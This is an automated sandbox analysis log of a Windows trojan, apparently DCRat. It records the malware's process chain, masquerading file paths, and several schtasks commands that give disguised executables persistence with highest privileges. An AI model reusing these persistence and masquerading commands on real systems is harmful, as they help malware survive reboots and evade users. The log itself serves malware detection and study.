Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 33_2_00007FFD9BAA0E43	33_2_00007FFD9BAA0E43
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAD06AE	34_2_00007FFD9BAD06AE
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAD0456	34_2_00007FFD9BAD0456
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAD088F	34_2_00007FFD9BAD088F
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAC0D48	34_2_00007FFD9BAC0D48
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAC0E43	34_2_00007FFD9BAC0E43
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Code function: 34_2_00007FFD9BAF1865	34_2_00007FFD9BAF1865
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 35_2_00007FFD9BAB0D48	35_2_00007FFD9BAB0D48
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 35_2_00007FFD9BAB0E43	35_2_00007FFD9BAB0E43
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAC06AE	36_2_00007FFD9BAC06AE
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAC0501	36_2_00007FFD9BAC0501
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAC088F	36_2_00007FFD9BAC088F
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAE1865	36_2_00007FFD9BAE1865
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAB0D48	36_2_00007FFD9BAB0D48
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Code function: 36_2_00007FFD9BAB0E43	36_2_00007FFD9BAB0E43

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\iJCvyQAH.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: String function: 0013EC50 appears 56 times
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: String function: 0013F5F0 appears 31 times
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: String function: 0013EB78 appears 39 times

Source: yX8787W7de.exe, 00000000.00000003.1640565455.0000000006B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs yX8787W7de.exe
Source: yX8787W7de.exe, 00000000.00000003.1639922058.0000000006213000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs yX8787W7de.exe
Source: yX8787W7de.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs yX8787W7de.exe

Source: yX8787W7de.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MsintoRefcommonsvc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SwjJGfgwqbpLdPqvPFcqLsY.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@52/31@1/1

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_00126C74 GetLastError,FormatMessageW,

0_2_00126C74

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0013A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0013A6C2

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

File created: C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe

Jump to behavior

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

File created: C:\Users\user\Desktop\iJCvyQAH.log

Jump to behavior

Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Mutant created: NULL
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-laCdvL0mPwbWT7P7uNow
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

File created: C:\Users\user\AppData\Local\Temp\i0e0ny4g

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" "

Source: C:\Users\user\Desktop\yX8787W7de.exe	Command line argument: sfxname	0_2_0013DF1E
Source: C:\Users\user\Desktop\yX8787W7de.exe	Command line argument: sfxstime	0_2_0013DF1E
Source: C:\Users\user\Desktop\yX8787W7de.exe	Command line argument: STARTDLG	0_2_0013DF1E

Source: yX8787W7de.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yX8787W7de.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\yX8787W7de.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yX8787W7de.exe	ReversingLabs: Detection: 79%
Source: yX8787W7de.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\yX8787W7de.exe

File read: C:\Users\user\Desktop\yX8787W7de.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yX8787W7de.exe "C:\Users\user\Desktop\yX8787W7de.exe"
Source: C:\Users\user\Desktop\yX8787W7de.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\fontrefcrt\MsintoRefcommonsvc.exe "C:\fontrefcrt/MsintoRefcommonsvc.exe"
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SystemSettings.exe'" /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FAE.tmp" "c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP"
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsY" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
Source: unknown	Process created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
Source: unknown	Process created: C:\fontrefcrt\MsintoRefcommonsvc.exe C:\fontrefcrt\MsintoRefcommonsvc.exe
Source: unknown	Process created: C:\fontrefcrt\MsintoRefcommonsvc.exe C:\fontrefcrt\MsintoRefcommonsvc.exe
Source: unknown	Process created: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Source: unknown	Process created: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yX8787W7de.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\fontrefcrt\MsintoRefcommonsvc.exe "C:\fontrefcrt/MsintoRefcommonsvc.exe"	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FAE.tmp" "c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yX8787W7de.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: version.dll	Jump to behavior
